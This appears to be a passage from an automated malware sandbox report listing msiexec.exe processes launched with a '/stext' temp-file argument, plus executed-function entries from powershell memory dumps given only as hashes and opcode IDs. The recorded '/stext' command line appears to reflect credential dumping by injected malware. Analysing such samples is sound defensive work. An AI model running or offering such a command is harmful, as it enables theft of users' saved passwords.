                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:42
                                                      Start time:05:06:59
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:43
                                                      Start time:05:06:59
                                                      Start date:14/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz"
                                                      Imagebase:0x450000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FF7BFE4B276 Relevance: .5, Instructions: 476COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1451676074.00007FF7BFE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFE40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bfe40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b00d21bed1be7efb2bb56131a24d145219a145d9fb12ad0081167e17306d661
                                                        • Instruction ID: ff5d9a3c8f6a94510fa9c78c6539a5b8eb931faf60225141a7a520ff9777588f
                                                        • Opcode Fuzzy Hash: 6b00d21bed1be7efb2bb56131a24d145219a145d9fb12ad0081167e17306d661
                                                        • Instruction Fuzzy Hash: E6F1A730908A8D8FEBA8EF68C8557F977E1FF95310F44426EE84DC7295DB34A8458B81
                                                        Function 00007FF7BFE4C022 Relevance: .5, Instructions: 462COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1451676074.00007FF7BFE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFE40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bfe40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1bb0ef6199a11a60612df38f2264cbdef9577deb5424f3de028faa94fe4cd0e3
                                                        • Instruction ID: a03fdb3d5ba639f6ec16055eb8b28c745d8be85c85c862c8b74842aef191d993
                                                        • Opcode Fuzzy Hash: 1bb0ef6199a11a60612df38f2264cbdef9577deb5424f3de028faa94fe4cd0e3
                                                        • Instruction Fuzzy Hash: 9EE1C530908A8D8FEBA8EF6CC8557F977E1FF95310F44426EE84DC7295DA74A8418B81
                                                        Function 00007FF7BFF1589D Relevance: 2.9, Strings: 2, Instructions: 368COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6a$6a
                                                        • API String ID: 0-3127002194
                                                        • Opcode ID: 034dc98fea3443489294d1379da0a541a03c8ba66505b0adebf450fa588519bf
                                                        • Instruction ID: 86534d6a6a74147c7d05a0459c601fa2bdea8ab19a31c1777ab7bb59ddf75a26
                                                        • Opcode Fuzzy Hash: 034dc98fea3443489294d1379da0a541a03c8ba66505b0adebf450fa588519bf
                                                        • Instruction Fuzzy Hash: 0DB13522E0DEC90FE795EB6C54546F4BBE1EF66721B8C02FAC11DC7193DA18AD0583A1
                                                        Function 00007FF7BFE4E5F2 Relevance: .8, Instructions: 768COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1451676074.00007FF7BFE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFE40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bfe40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79588073b860737efd9e41420e6fd519aa8cf1e171d612d121941d4b3fdf951a
                                                        • Instruction ID: cc0a95c732b5d79d63212abbefb65dbac72abb912b5cb53344ebf6641da27fef
                                                        • Opcode Fuzzy Hash: 79588073b860737efd9e41420e6fd519aa8cf1e171d612d121941d4b3fdf951a
                                                        • Instruction Fuzzy Hash: 3EF17230A08A8D8FDF88EF5CC455AEDBBE1FFA9710F54416AE409D7295CA34E841CB81
                                                        Function 00007FF7BFF148F9 Relevance: .5, Instructions: 535COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af39938c3e377bdbeb03a48b9da567d6f432be1974bf4f5cabeed9f245ffbdf3
                                                        • Instruction ID: 1de07237c74d3bdb68c5e0350e2477d6b2846429c3f35037367525aa1088daa2
                                                        • Opcode Fuzzy Hash: af39938c3e377bdbeb03a48b9da567d6f432be1974bf4f5cabeed9f245ffbdf3
                                                        • Instruction Fuzzy Hash: 50F15821D0DFC60FE366AB6C58112F4BB91EFA7721B8902FED159C71E7D918A8058362
                                                        Function 00007FF7BFF1A024 Relevance: .4, Instructions: 445COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 870934e593f90be88274a07496cd2091b131f600973f418d2d5e3345f8fae292
                                                        • Instruction ID: 66861540efe9ae0ec049b6b5ef42f0d0a1c49aba85f6c894008c2c23effb7057
                                                        • Opcode Fuzzy Hash: 870934e593f90be88274a07496cd2091b131f600973f418d2d5e3345f8fae292
                                                        • Instruction Fuzzy Hash: A8D15531A0DFC90FE796AB6C48142B4FBE1EF67621B4801FBC059CB197DA19AD05C762
                                                        Function 00007FF7BFF17B16 Relevance: .4, Instructions: 427COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d6f3cf2e56dae7c15d117646526d838910adda693208279ec21ac66f6f40b52
                                                        • Instruction ID: ebbc11c3c4e4c437ef97425ebeffda5a15457888b4f49a46551be23fa164bfdf
                                                        • Opcode Fuzzy Hash: 8d6f3cf2e56dae7c15d117646526d838910adda693208279ec21ac66f6f40b52
                                                        • Instruction Fuzzy Hash: E0C16E32A0CECE4FEBA5A76C88041B5B7D1EF66722F9401BEC25DC7197DE15AC068351
                                                        Function 00007FF7BFE4BC36 Relevance: .3, Instructions: 334COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1451676074.00007FF7BFE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFE40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bfe40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1457d6c50e096898a5d9f0b3beb806e166121929fda21ec63530cafbf2ca8e74
                                                        • Instruction ID: 78fb61444ef0109b16120b3184a3403f96eb1c1276fd10f33d2b8f7355d0c014
                                                        • Opcode Fuzzy Hash: 1457d6c50e096898a5d9f0b3beb806e166121929fda21ec63530cafbf2ca8e74
                                                        • Instruction Fuzzy Hash: AAB1B63050CA8D8FDB68EF28C8557F97BE1FF95350F44426EE84DC7296CA34A9458B82
                                                        Function 00007FF7BFF1AA3A Relevance: .2, Instructions: 216COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2639b4ab6c66ee449aacfc5d14e243aa6f62b8fb80f216278e13815ef7448f9
                                                        • Instruction ID: 0addc2fa649625627da1cc53fce92079396cb1092293da45a702beb00525d0ad
                                                        • Opcode Fuzzy Hash: a2639b4ab6c66ee449aacfc5d14e243aa6f62b8fb80f216278e13815ef7448f9
                                                        • Instruction Fuzzy Hash: 22610631A0DFC54FD757EB6888206E5FFA1EF67211B4901EBC159CB0E3DA189905C7A2
                                                        Function 00007FF7BFF1A78F Relevance: .2, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b63e9480ed5adb86ff1c0173c184316ed7396c0a40f1a5102e6f80736cf13fd
                                                        • Instruction ID: f873fe5fc2be6b388e2f6402b5259cdcbfe1f7d004fac5822e24fd43b209b755
                                                        • Opcode Fuzzy Hash: 6b63e9480ed5adb86ff1c0173c184316ed7396c0a40f1a5102e6f80736cf13fd
                                                        • Instruction Fuzzy Hash: 13512331E0DFC54FE785EB6888512A8FBA1FF66720F4801BEC04D87193DE28AD468752
                                                        Function 00007FF7BFF19B1A Relevance: .2, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 939687e030a7914ea1de6ee7bcc9f219bae82bdb020f15d7ffd8edf24c0632d9
                                                        • Instruction ID: 901bdd0a15161f6291e0b7c13800bf53ae0b8e226df80fffe9ca0a910a95d3d1
                                                        • Opcode Fuzzy Hash: 939687e030a7914ea1de6ee7bcc9f219bae82bdb020f15d7ffd8edf24c0632d9
                                                        • Instruction Fuzzy Hash: 8F511831E0DFC54FE765EB6888512A8BBE1FF66721F4401FEC04D87193DA28A9458792
                                                        Function 00007FF7BFF1AFAA Relevance: .2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 647c035b54708678c205f3fdbd739ecf4fb9aff2cb68fa4a5b7da6000795b064
                                                        • Instruction ID: 1d95078800ec53de96e722abc74bfa826c762ab1d24538e43799290ce3745369
                                                        • Opcode Fuzzy Hash: 647c035b54708678c205f3fdbd739ecf4fb9aff2cb68fa4a5b7da6000795b064
                                                        • Instruction Fuzzy Hash: 66513731E0DFC58FE795EB6888552A8F7A1FF66B60F4401FEC10C87193DE28A9458742
                                                        Function 00007FF7BFF1AF9A Relevance: .2, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75398c20aa445efa60661d1887a5a760a094597cfd8f713e20f8fe465a64ac1e
                                                        • Instruction ID: 45e8dd048fcccac9df52a5db75d4ba7c91dd5adc082e160fca8ac6549036966b
                                                        • Opcode Fuzzy Hash: 75398c20aa445efa60661d1887a5a760a094597cfd8f713e20f8fe465a64ac1e
                                                        • Instruction Fuzzy Hash: C6515631E0CFC58FE755EB6888552A8F7A1FF66B60F4402FEC11D87293CE28A9458742
                                                        Function 00007FF7BFF159C2 Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07700585ec627377f0c55155858fec26ff0825b96fa352964415d782c1d08c50
                                                        • Instruction ID: f3b6ea73ec4ec66bf02ca6e8d54264b59f107368b5e3352da27523081ab20c87
                                                        • Opcode Fuzzy Hash: 07700585ec627377f0c55155858fec26ff0825b96fa352964415d782c1d08c50
                                                        • Instruction Fuzzy Hash: E3310522D5EEC60FE395A7AC18911F8A6D1AF16762B9C03FAD12DC31D7DF086D054362
                                                        Function 00007FF7BFF14A84 Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 647be3b958b74357ea3a937cd7eff10a1ed46290021770c9d05d791a7a718158
                                                        • Instruction ID: bb93b207128f94251ab7ecc25ff1baa1cba00c4353915abb97565fbb35521ed5
                                                        • Opcode Fuzzy Hash: 647be3b958b74357ea3a937cd7eff10a1ed46290021770c9d05d791a7a718158
                                                        • Instruction Fuzzy Hash: 33214B32E0DE8A4FE3A5FAAC14502F4E2C2EFA7B227D902B9D11DC7197DD18EC014211
                                                        Function 00007FF7BFE4B734 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1451676074.00007FF7BFE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFE40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bfe40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e2fb5f4f1fe0a5b30e2e57296b6b1b84ebb4ae56b787b3dd34556f55a9d91c94
                                                        • Instruction ID: fbc5e50a05270d84ad70b9d51c412c395b5fdff01aff4de3258a6c9d45dbd6cd
                                                        • Opcode Fuzzy Hash: e2fb5f4f1fe0a5b30e2e57296b6b1b84ebb4ae56b787b3dd34556f55a9d91c94
                                                        • Instruction Fuzzy Hash: 0531FE3081958D8EFBB4BF68CC1ABF97294FF96715F80063DD50D86096CA386985CA25
                                                        Function 00007FF7BFF119EF Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 42846c0c71a11ab64b25995d140ddbaa8ada601cd03e71104f0cc1d8a1e960c1
                                                        • Instruction ID: 59ebf64cd5cbaeddabfb86b3cd45daa496387444c8be0a5eac7f69b192fd4a1c
                                                        • Opcode Fuzzy Hash: 42846c0c71a11ab64b25995d140ddbaa8ada601cd03e71104f0cc1d8a1e960c1
                                                        • Instruction Fuzzy Hash: 05213822E0EAC54FD351A73C14191B8BFD0EF9666175846FFD099C71D3DD28484A8762
                                                        Function 00007FF7BFF197CB Relevance: .1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da7fe79f6e8d8b072ce6f67651b7d33a31525e78e024d218308878a50c84a60e
                                                        • Instruction ID: e9e401a09e794e671f657e46e8a70c3fdcd97a03cc9b7dc25f14466ebd9932f0
                                                        • Opcode Fuzzy Hash: da7fe79f6e8d8b072ce6f67651b7d33a31525e78e024d218308878a50c84a60e
                                                        • Instruction Fuzzy Hash: 6B11E521A0DEC55FD7AAEB7C44506A5BBD1EF1675034806EEC05ACB197D918A84883E1
                                                        Function 00007FF7BFE441E5 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1451676074.00007FF7BFE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFE40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bfe40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                        • Instruction ID: 738ea090159137aceeda566b280f097465aa503f8f527b2931113084952f732e
                                                        • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                        • Instruction Fuzzy Hash: F401A73110CB0C4FD744EF0CE051AB5B3E0FB95360F10052EE58AC3655D632E882CB41
                                                        Function 00007FF7BFF195A9 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1452481148.00007FF7BFF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ff7bff10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1ff8c6af63eab1147ec87111c0e3bb685b37d313ad1ef7ccb3bd1e7a1b959eb8
                                                        • Instruction ID: ce0443a4a8e2b78a9b1c5aa1ef9ff553bb2486b07ca5f2dc2f820e97b4574faf
                                                        • Opcode Fuzzy Hash: 1ff8c6af63eab1147ec87111c0e3bb685b37d313ad1ef7ccb3bd1e7a1b959eb8
                                                        • Instruction Fuzzy Hash: 88E0DF33F0CE090EFB98665C78121F9B3E2EF85631788043FE24EC2487E81AA8124281

                                                        Executed Functions

                                                        Function 029BF360 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \VBk
                                                        • API String ID: 0-3498158163
                                                        • Opcode ID: 799a2e27c59c341084a2ff2272d04b78b7bc9e19f49a08b0e9a2f134914cdbd7
                                                        • Instruction ID: a96dcf37e22a375e4d4690fed1f31d222ab0845aafa5aa9e0bc1190eb7de99d9
                                                        • Opcode Fuzzy Hash: 799a2e27c59c341084a2ff2272d04b78b7bc9e19f49a08b0e9a2f134914cdbd7
                                                        • Instruction Fuzzy Hash: 19B13B70E00209CFDB25CFA9D9857EEBBF6BF88714F148129E815A7654EB749841CB81
                                                        Function 029BFC30 Relevance: .3, Instructions: 266COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd6c82cb66b4d1cf0be6747c8f1e77bac04334c27f2b830880f09f5cc1266422
                                                        • Instruction ID: f7d9fbf519d5e977c7e5b417bf58ef92e69d29a8bd379411d98706003b6264a0
                                                        • Opcode Fuzzy Hash: cd6c82cb66b4d1cf0be6747c8f1e77bac04334c27f2b830880f09f5cc1266422
                                                        • Instruction Fuzzy Hash: D0B14C70E002098FDB11CFA9DD857EEBBF6BF88314F148529E815A7694EB749885CB81
                                                        Function 029BB870 Relevance: 5.5, Strings: 4, Instructions: 460COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h]Bk$h]Bk$h]Bk$IBk
                                                        • API String ID: 0-1840753891
                                                        • Opcode ID: db660b4639ac64913d8c2e5eaaa5b2c4001b4af003fdc525b12ae03d6ce89470
                                                        • Instruction ID: 4c51623d739877b9b0c33cdbb9b52f64f4844a4edea17c84183b93b7467869db
                                                        • Opcode Fuzzy Hash: db660b4639ac64913d8c2e5eaaa5b2c4001b4af003fdc525b12ae03d6ce89470
                                                        • Instruction Fuzzy Hash: 62126334B002188FDB26EB74C954BEEB7B6AF89344F1040A9D909AB351DF359D45CF91
                                                        Function 029BF9A8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \VBk$\VBk
                                                        • API String ID: 0-2500147663
                                                        • Opcode ID: c005a0c12102cd95ccffffae04ac91c1bf18d8cf117eff286a4bb26f0bf85076
                                                        • Instruction ID: 3165dc5578017882ea8ed051a877a9ebf0700184facbe2fff3b223f77fea584d
                                                        • Opcode Fuzzy Hash: c005a0c12102cd95ccffffae04ac91c1bf18d8cf117eff286a4bb26f0bf85076
                                                        • Instruction Fuzzy Hash: 447159B1E002199FDF15CFA9C980BDEBBF6BF88314F148129E419A7654EB749842CF91
                                                        Function 029BF99D Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \VBk$\VBk
                                                        • API String ID: 0-2500147663
                                                        • Opcode ID: 6fc44172e81cc233bc7e55a44a4e33333aec1bc6df776f96071071cfb3722e37
                                                        • Instruction ID: b360cfb8277b7c97c5a4ba66e74e0f40fcdebc94971241081ade8431c1c041aa
                                                        • Opcode Fuzzy Hash: 6fc44172e81cc233bc7e55a44a4e33333aec1bc6df776f96071071cfb3722e37
                                                        • Instruction Fuzzy Hash: AB7149B1E002199FDB15CFA9C981BDEBBF6BF88314F148129E418A7654EB749842CF91
                                                        Function 029BF9A5 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \VBk$\VBk
                                                        • API String ID: 0-2500147663
                                                        • Opcode ID: 581fbfe38742e64e17e320b9f2249403b957570ee31935686ac06672102d5cb5
                                                        • Instruction ID: f31c5d2fe3b9fbcf972e2767f22505975078e975d96c0a02c073111e1b900a71
                                                        • Opcode Fuzzy Hash: 581fbfe38742e64e17e320b9f2249403b957570ee31935686ac06672102d5cb5
                                                        • Instruction Fuzzy Hash: C87149B1E00219DFDB15CFA9C980BDEBBF6BF88314F148129E418A7654EB749842CF91
                                                        Function 029BF9A0 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \VBk$\VBk
                                                        • API String ID: 0-2500147663
                                                        • Opcode ID: 0369982d64608f9440c5a42724b201cc34784c06a762f303c6a383ead21f7f56
                                                        • Instruction ID: ce616b4e922a0578ecb03b78979fcb3f968b2c54cf8878a20501da1aaabd71e5
                                                        • Opcode Fuzzy Hash: 0369982d64608f9440c5a42724b201cc34784c06a762f303c6a383ead21f7f56
                                                        • Instruction Fuzzy Hash: D8714AB1E00219DFDB15CFA9C9807DEBBF6BF88314F148129E419A7654EB749842CF91
                                                        Function 029BC528 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h]Bk$IBk
                                                        • API String ID: 0-1989460551
                                                        • Opcode ID: e091ebb92a30325505cc1fcb07376a7f9ef1cf0e77b4604012192728d1db04ca
                                                        • Instruction ID: 778b65165d68a289d281b750c0e2c57aa0bda8af17e722a0d08d46b19ac33d1c
                                                        • Opcode Fuzzy Hash: e091ebb92a30325505cc1fcb07376a7f9ef1cf0e77b4604012192728d1db04ca
                                                        • Instruction Fuzzy Hash: 3D310A34A001288FCB26DB64C955BEEB7B2BF89345F1044EAC909AB351CB759E85CF91
                                                        Function 029BF354 Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_29b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \VBk
                                                        • API String ID: 0-3498158163
                                                        • Opcode ID: c811930f62d6418e0b7435ac6c5f629718e02f00ecee8d536c787aaa14e8f789
                                                        • Instruction ID: 766faafd1fc7b2b0999ef81690acd3cab1f7147742fb3f17ddf228dd25c3ffcf
                                                        • Opcode Fuzzy Hash: c811930f62d6418e0b7435ac6c5f629718e02f00ecee8d536c787aaa14e8f789
                                                        • Instruction Fuzzy Hash: E5B13970E00209CFDB21CFA9DA857EEBBF6BF48714F148129E815A7694EB749841CF91
                                                        Function 029BF35D Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1615221686.00000000029B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
